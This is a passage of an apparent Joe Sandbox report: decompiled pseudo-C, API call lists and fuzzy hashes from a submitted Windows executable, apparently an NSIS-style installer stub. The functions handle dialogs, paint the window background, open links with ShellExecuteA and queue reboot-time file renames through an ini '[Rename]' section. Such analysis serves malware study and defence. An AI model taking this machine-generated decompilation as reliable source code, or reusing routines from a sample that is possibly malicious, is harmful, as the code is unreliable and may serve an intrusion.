                                                  									_push(_t133);
                                                  									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                                                  									__eflags =  *0x42374c - _t133;
                                                  									if( *0x42374c != _t133) {
                                                  										goto L61;
                                                  									}
                                                  									ShowWindow( *0x423758, 8);
                                                  									E00404003(0x405);
                                                  									goto L58;
                                                  								}
                                                  								__eflags =  *0x42400c - _t133;
                                                  								if( *0x42400c != _t133) {
                                                  									goto L61;
                                                  								}
                                                  								__eflags =  *0x424000 - _t133;
                                                  								if( *0x424000 != _t133) {
                                                  									continue;
                                                  								}
                                                  								goto L61;
                                                  							}
                                                  						}
                                                  						DestroyWindow( *0x423758);
                                                  						 *0x423f88 = _t133;
                                                  						EndDialog(_t125,  *0x41f948);
                                                  						goto L58;
                                                  					} else {
                                                  						__eflags = _t35 - 1;
                                                  						if(_t35 != 1) {
                                                  							L33:
                                                  							__eflags =  *_t130 - _t133;
                                                  							if( *_t130 == _t133) {
                                                  								goto L61;
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_push(0);
                                                  						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                  						__eflags = _t86;
                                                  						if(_t86 == 0) {
                                                  							goto L33;
                                                  						}
                                                  						SendMessageA( *0x423758, 0x40f, 0, 1);
                                                  						__eflags =  *0x42374c;
                                                  						return 0 |  *0x42374c == 0x00000000;
                                                  					}
                                                  				} else {
                                                  					_t125 = _a4;
                                                  					_t133 = 0;
                                                  					if(_t115 == 0x47) {
                                                  						SetWindowPos( *0x420558, _t125, 0, 0, 0, 0, 0x13);
                                                  					}
                                                  					if(_t115 == 5) {
                                                  						asm("sbb eax, eax");
                                                  						ShowWindow( *0x420558,  ~(_a12 - 1) & _t115);
                                                  					}
                                                  					if(_t115 != 0x40d) {
                                                  						__eflags = _t115 - 0x11;
                                                  						if(_t115 != 0x11) {
                                                  							__eflags = _t115 - 0x111;
                                                  							if(_t115 != 0x111) {
                                                  								L26:
                                                  								return E0040401E(_t115, _a12, _a16);
                                                  							}
                                                  							_t132 = _a12 & 0x0000ffff;
                                                  							_t126 = GetDlgItem(_t125, _t132);
                                                  							__eflags = _t126 - _t133;
                                                  							if(_t126 == _t133) {
                                                  								L13:
                                                  								__eflags = _t132 - 1;
                                                  								if(_t132 != 1) {
                                                  									__eflags = _t132 - 3;
                                                  									if(_t132 != 3) {
                                                  										_t127 = 2;
                                                  										__eflags = _t132 - _t127;
                                                  										if(_t132 != _t127) {
                                                  											L25:
                                                  											SendMessageA( *0x423758, 0x111, _a12, _a16);
                                                  											goto L26;
                                                  										}
                                                  										__eflags =  *0x42400c - _t133;
                                                  										if( *0x42400c == _t133) {
                                                  											_t99 = E0040140B(3);
                                                  											__eflags = _t99;
                                                  											if(_t99 != 0) {
                                                  												goto L26;
                                                  											}
                                                  											 *0x41f948 = 1;
                                                  											L21:
                                                  											_push(0x78);
                                                  											L22:
                                                  											E00403F90();
                                                  											goto L26;
                                                  										}
                                                  										E0040140B(_t127);
                                                  										 *0x41f948 = _t127;
                                                  										goto L21;
                                                  									}
                                                  									__eflags =  *0x4091e8 - _t133; // 0xffffffff
                                                  									if(__eflags <= 0) {
                                                  										goto L25;
                                                  									}
                                                  									_push(0xffffffff);
                                                  									goto L22;
                                                  								}
                                                  								_push(_t132);
                                                  								goto L22;
                                                  							}
                                                  							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                  							_t103 = IsWindowEnabled(_t126);
                                                  							__eflags = _t103;
                                                  							if(_t103 == 0) {
                                                  								goto L61;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						SetWindowLongA(_t125, _t133, _t133);
                                                  						return 1;
                                                  					} else {
                                                  						DestroyWindow( *0x423758);
                                                  						 *0x423758 = _a12;
                                                  						L58:
                                                  						_t141 =  *0x421580 - _t133; // 0x0
                                                  						if(_t141 == 0 &&  *0x423758 != _t133) {
                                                  							ShowWindow(_t125, 0xa);
                                                  							 *0x421580 = 1;
                                                  						}
                                                  						L61:
                                                  						return 0;
                                                  					}
                                                  				}
                                                  			}
































                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B20
                                                  • ShowWindow.USER32(?), ref: 00403B3D
                                                  • DestroyWindow.USER32 ref: 00403B51
                                                  • SetWindowLongA.USER32 ref: 00403B6D
                                                  • GetDlgItem.USER32 ref: 00403B8E
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BA2
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403BA9
                                                  • GetDlgItem.USER32 ref: 00403C57
                                                  • GetDlgItem.USER32 ref: 00403C61
                                                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403C7B
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CCC
                                                  • GetDlgItem.USER32 ref: 00403D72
                                                  • ShowWindow.USER32(00000000,?), ref: 00403D93
                                                  • EnableWindow.USER32(?,?), ref: 00403DA5
                                                  • EnableWindow.USER32(?,?), ref: 00403DC0
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DD6
                                                  • EnableMenuItem.USER32 ref: 00403DDD
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DF5
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E08
                                                  • lstrlenA.KERNEL32(00420580,?,00420580,00423780), ref: 00403E31
                                                  • SetWindowTextA.USER32(?,00420580), ref: 00403E40
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403F74
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 184305955-0
                                                  • Opcode ID: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                  • Instruction ID: 583b1d6e72ee06ddf0416b700d05e2a9c6fbe9640e5ca120217838ed285f2c24
                                                  • Opcode Fuzzy Hash: 4d3bbdf9db9246a7f18a05b6fc397e10c1c96f644e1aca1d2e09b909f4145d9c
                                                  • Instruction Fuzzy Hash: 00C1C471A08205BBDB216F61ED85D2B7FBCEB4470AF50443EF601B51E1C739AA429B1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E004040FF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                  				char _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				struct HWND__* _t52;
                                                  				long _t86;
                                                  				int _t98;
                                                  				struct HWND__* _t99;
                                                  				signed int _t100;
                                                  				intOrPtr _t109;
                                                  				int _t110;
                                                  				signed int* _t112;
                                                  				signed int _t113;
                                                  				char* _t114;
                                                  				CHAR* _t115;
                                                  
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 != 0x111) {
                                                  						L11:
                                                  						if(_a8 != 0x4e) {
                                                  							if(_a8 == 0x40b) {
                                                  								 *0x420560 =  *0x420560 + 1;
                                                  							}
                                                  							L25:
                                                  							_t110 = _a16;
                                                  							L26:
                                                  							return E0040401E(_a8, _a12, _t110);
                                                  						}
                                                  						_t52 = GetDlgItem(_a4, 0x3e8);
                                                  						_t110 = _a16;
                                                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                  							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                  							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                  							_v12 = _t100;
                                                  							_v16 = _t109;
                                                  							_v8 = 0x422f20;
                                                  							if(_t100 - _t109 < 0x800) {
                                                  								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                  								SetCursor(LoadCursorA(0, 0x7f02));
                                                  								_t40 =  &_v8; // 0x422f20
                                                  								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                                                  								SetCursor(LoadCursorA(0, 0x7f00));
                                                  								_t110 = _a16;
                                                  							}
                                                  						}
                                                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                  							goto L26;
                                                  						} else {
                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                  								SendMessageA( *0x423f88, 0x111, 1, 0);
                                                  							}
                                                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                  								SendMessageA( *0x423f88, 0x10, 0, 0);
                                                  							}
                                                  							return 1;
                                                  						}
                                                  					}
                                                  					if(_a12 >> 0x10 != 0 ||  *0x420560 != 0) {
                                                  						goto L25;
                                                  					} else {
                                                  						_t112 =  *0x41fd50 + 0x14;
                                                  						if(( *_t112 & 0x00000020) == 0) {
                                                  							goto L25;
                                                  						}
                                                  						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                  						E00403FD9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                  						E0040438A();
                                                  						goto L11;
                                                  					}
                                                  				}
                                                  				_t98 = _a16;
                                                  				_t113 =  *(_t98 + 0x30);
                                                  				if(_t113 < 0) {
                                                  					_t113 =  *( *0x42375c - 4 + _t113 * 4);
                                                  				}
                                                  				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                  				_t114 = _t113 +  *0x423fb8;
                                                  				_push(0x22);
                                                  				_a16 =  *_t114;
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t115 = _t114 + 1;
                                                  				_v16 = _t115;
                                                  				_v8 = E004040CB;
                                                  				E00403FB7(_a4);
                                                  				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                  				_push(0x23);
                                                  				E00403FB7(_a4);
                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                  				E00403FD9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                  				_t99 = GetDlgItem(_a4, 0x3e8);
                                                  				E00403FEC(_t99);
                                                  				SendMessageA(_t99, 0x45b, 1, 0);
                                                  				_t86 =  *( *0x423f90 + 0x68);
                                                  				if(_t86 < 0) {
                                                  					_t86 = GetSysColor( ~_t86);
                                                  				}
                                                  				SendMessageA(_t99, 0x443, 0, _t86);
                                                  				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                  				 *0x41f544 =  *0x41f544 & 0x00000000;
                                                  				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                  				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                  				 *0x420560 =  *0x420560 & 0x00000000;
                                                  				return 0;
                                                  			}


                                                  APIs
                                                  • CheckDlgButton.USER32 ref: 0040418A
                                                  • GetDlgItem.USER32 ref: 0040419E
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041BC
                                                  • GetSysColor.USER32(?), ref: 004041CD
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041DC
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004041EB
                                                  • lstrlenA.KERNEL32(?), ref: 004041F5
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404203
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404212
                                                  • GetDlgItem.USER32 ref: 00404275
                                                  • SendMessageA.USER32(00000000), ref: 00404278
                                                  • GetDlgItem.USER32 ref: 004042A3
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042E3
                                                  • LoadCursorA.USER32 ref: 004042F2
                                                  • SetCursor.USER32(00000000), ref: 004042FB
                                                  • ShellExecuteA.SHELL32(0000070B,open, /B,00000000,00000000,00000001), ref: 0040430E
                                                  • LoadCursorA.USER32 ref: 0040431B
                                                  • SetCursor.USER32(00000000), ref: 0040431E
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040434A
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040435E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: /B$N$open
                                                  • API String ID: 3615053054-636633259
                                                  • Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                  • Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
                                                  • Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                  • Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				struct tagRECT _v32;
                                                  				struct tagPAINTSTRUCT _v96;
                                                  				struct HDC__* _t70;
                                                  				struct HBRUSH__* _t87;
                                                  				struct HFONT__* _t94;
                                                  				long _t102;
                                                  				signed int _t126;
                                                  				struct HDC__* _t128;
                                                  				intOrPtr _t130;
                                                  
                                                  				if(_a8 == 0xf) {
                                                  					_t130 =  *0x423f90;
                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                  					_a8 = _t70;
                                                  					GetClientRect(_a4,  &_v32);
                                                  					_t126 = _v32.bottom;
                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                  					while(_v32.top < _t126) {
                                                  						_a12 = _t126 - _v32.top;
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                  						_v32.bottom = _v32.bottom + 4;
                                                  						_a16 = _t87;
                                                  						FillRect(_a8,  &_v32, _t87);
                                                  						DeleteObject(_a16);
                                                  						_v32.top = _v32.top + 4;
                                                  					}
                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                  						_a16 = _t94;
                                                  						if(_t94 != 0) {
                                                  							_t128 = _a8;
                                                  							_v32.left = 0x10;
                                                  							_v32.top = 8;
                                                  							SetBkMode(_t128, 1);
                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                  							_a8 = SelectObject(_t128, _a16);
                                                  							DrawTextA(_t128, 0x423780, 0xffffffff,  &_v32, 0x820);
                                                  							SelectObject(_t128, _a8);
                                                  							DeleteObject(_a16);
                                                  						}
                                                  					}
                                                  					EndPaint(_a4,  &_v96);
                                                  					return 0;
                                                  				}
                                                  				_t102 = _a16;
                                                  				if(_a8 == 0x46) {
                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x423f88;
                                                  				}
                                                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                  			}














                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,00423780,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                  • Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
                                                  • Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                  • Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 93%
                                                  			E00405A49(void* __eflags) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				intOrPtr* _t15;
                                                  				long _t16;
                                                  				int _t20;
                                                  				void* _t28;
                                                  				long _t29;
                                                  				intOrPtr* _t37;
                                                  				int _t43;
                                                  				void* _t44;
                                                  				long _t47;
                                                  				CHAR* _t49;
                                                  				void* _t51;
                                                  				void* _t53;
                                                  				intOrPtr* _t54;
                                                  				void* _t55;
                                                  				void* _t56;
                                                  
                                                  				_t15 = E00406087(2);
                                                  				_t49 =  *(_t55 + 0x18);
                                                  				if(_t15 != 0) {
                                                  					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                  					if(_t20 != 0) {
                                                  						L16:
                                                  						 *0x424010 =  *0x424010 + 1;
                                                  						return _t20;
                                                  					}
                                                  				}
                                                  				 *0x422710 = 0x4c554e;
                                                  				if(_t49 == 0) {
                                                  					L5:
                                                  					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
                                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                                  						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
                                                  						_t56 = _t55 + 0x10;
                                                  						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)( *0x423f90 + 0x128)));
                                                  						_t20 = E004059D2(0x422188, 0xc0000000, 4);
                                                  						_t53 = _t20;
                                                  						 *(_t56 + 0x14) = _t53;
                                                  						if(_t53 == 0xffffffff) {
                                                  							goto L16;
                                                  						}
                                                  						_t47 = GetFileSize(_t53, 0);
                                                  						_t7 = _t43 + 0xa; // 0xa
                                                  						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                  						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                  							L15:
                                                  							_t20 = CloseHandle(_t53);
                                                  							goto L16;
                                                  						} else {
                                                  							if(E00405947(_t51, "[Rename]\r\n") != 0) {
                                                  								_t28 = E00405947(_t26 + 0xa, 0x409424);
                                                  								if(_t28 == 0) {
                                                  									L13:
                                                  									_t29 = _t47;
                                                  									L14:
                                                  									E00405993(_t51 + _t29, 0x421d88, _t43);
                                                  									SetFilePointer(_t53, 0, 0, 0);
                                                  									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                  									GlobalFree(_t51);
                                                  									goto L15;
                                                  								}
                                                  								_t37 = _t28 + 1;
                                                  								_t44 = _t51 + _t47;
                                                  								_t54 = _t37;
                                                  								if(_t37 >= _t44) {
                                                  									L21:
                                                  									_t53 =  *(_t56 + 0x14);
                                                  									_t29 = _t37 - _t51;
                                                  									goto L14;
                                                  								} else {
                                                  									goto L20;
                                                  								}
                                                  								do {
                                                  									L20:
                                                  									 *((char*)(_t43 + _t54)) =  *_t54;
                                                  									_t54 = _t54 + 1;
                                                  								} while (_t54 < _t44);
                                                  								goto L21;
                                                  							}
                                                  							E00405CFB(_t51 + _t47, "[Rename]\r\n");
                                                  							_t47 = _t47 + 0xa;
                                                  							goto L13;
                                                  						}
                                                  					}
                                                  				} else {
                                                  					CloseHandle(E004059D2(_t49, 0, 1));
                                                  					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
                                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                                  						goto L5;
                                                  					}
                                                  				}
                                                  				return _t16;
                                                  			}






















                                                  APIs
                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
                                                  • GetShortPathNameA.KERNEL32 ref: 00405A9F
                                                  • GetShortPathNameA.KERNEL32 ref: 00405ABC
                                                  • wsprintfA.USER32 ref: 00405ADA
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
                                                  • GlobalFree.KERNEL32 ref: 00405B99
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0
                                                    • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                    • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                  • String ID: %s=%s$[Rename]
                                                  • API String ID: 3445103937-1727408572
                                                  • Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                  • Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
                                                  • Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                  • Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                  				signed int _v8;
                                                  				struct _ITEMIDLIST* _v12;
                                                  				signed int _v16;
                                                  				signed char _v20;
                                                  				signed int _v24;
                                                  				signed char _v28;
                                                  				signed int _t36;
                                                  				CHAR* _t37;
                                                  				signed int _t39;
                                                  				int _t40;
                                                  				char _t50;
                                                  				char _t51;
                                                  				char _t53;
                                                  				char _t55;
                                                  				void* _t63;
                                                  				signed int _t69;
                                                  				signed int _t74;
                                                  				signed int _t75;
                                                  				char _t83;
                                                  				void* _t85;
                                                  				CHAR* _t86;
                                                  				void* _t88;
                                                  				signed int _t95;
                                                  				signed int _t97;
                                                  				void* _t98;
                                                  
                                                  				_t88 = __esi;
                                                  				_t85 = __edi;
                                                  				_t63 = __ebx;
                                                  				_t36 = _a8;
                                                  				if(_t36 < 0) {
                                                  					_t36 =  *( *0x42375c - 4 + _t36 * 4);
                                                  				}
                                                  				_t74 =  *0x423fb8 + _t36;
                                                  				_t37 = 0x422f20;
                                                  				_push(_t63);
                                                  				_push(_t88);
                                                  				_push(_t85);
                                                  				_t86 = 0x422f20;
                                                  				if(_a4 - 0x422f20 < 0x800) {
                                                  					_t86 = _a4;
                                                  					_a4 = _a4 & 0x00000000;
                                                  				}
                                                  				while(1) {
                                                  					_t83 =  *_t74;
                                                  					if(_t83 == 0) {
                                                  						break;
                                                  					}
                                                  					__eflags = _t86 - _t37 - 0x400;
                                                  					if(_t86 - _t37 >= 0x400) {
                                                  						break;
                                                  					}
                                                  					_t74 = _t74 + 1;
                                                  					__eflags = _t83 - 0xfc;
                                                  					_a8 = _t74;
                                                  					if(__eflags <= 0) {
                                                  						if(__eflags != 0) {
                                                  							 *_t86 = _t83;
                                                  							_t86 =  &(_t86[1]);
                                                  							__eflags = _t86;
                                                  						} else {
                                                  							 *_t86 =  *_t74;
                                                  							_t86 =  &(_t86[1]);
                                                  							_t74 = _t74 + 1;
                                                  						}
                                                  						continue;
                                                  					}
                                                  					_t39 =  *(_t74 + 1);
                                                  					_t75 =  *_t74;
                                                  					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                  					_a8 = _a8 + 2;
                                                  					_v28 = _t75 | 0x00000080;
                                                  					_t69 = _t75;
                                                  					_v24 = _t69;
                                                  					__eflags = _t83 - 0xfe;
                                                  					_v20 = _t39 | 0x00000080;
                                                  					_v16 = _t39;
                                                  					if(_t83 != 0xfe) {
                                                  						__eflags = _t83 - 0xfd;
                                                  						if(_t83 != 0xfd) {
                                                  							__eflags = _t83 - 0xff;
                                                  							if(_t83 == 0xff) {
                                                  								__eflags = (_t39 | 0xffffffff) - _t95;
